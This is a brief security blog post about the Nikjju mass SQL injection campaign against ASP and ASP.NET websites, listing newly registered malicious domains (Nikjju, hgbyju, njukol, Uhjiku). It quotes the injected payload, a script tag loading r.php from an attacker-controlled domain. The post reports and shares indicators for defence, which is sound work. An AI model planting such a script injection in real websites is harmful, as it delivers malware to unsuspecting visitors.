CyberCrimals behind the Nikjju Mass injection attack, continue their SQL injection attack against ASP/ASP.net websites. Last month, Sucuri reported that more than 180,000 websites compromised.
Hackers compromised vulnerable sites by injection the following malicious script:
<script src=[Malware_Domain]/r.php ></script>
It seems like hackers registering new domains every week for this attack. Recently, F-Secure discovered a new domain 'njukol[dot]com'. The domain is registered on April 28 .
While analyzing one of the compromised websites, i found that there is new fresh domain has been used in this attack, 'Uhjiku[dot]com/r.php'. The Uhjiku is registered on May 5,2012(Yesterday).
The list of Malicious Domains:
- Nikjju.com
- hgbyju.com
- njukol.com
- Uhjiku.com
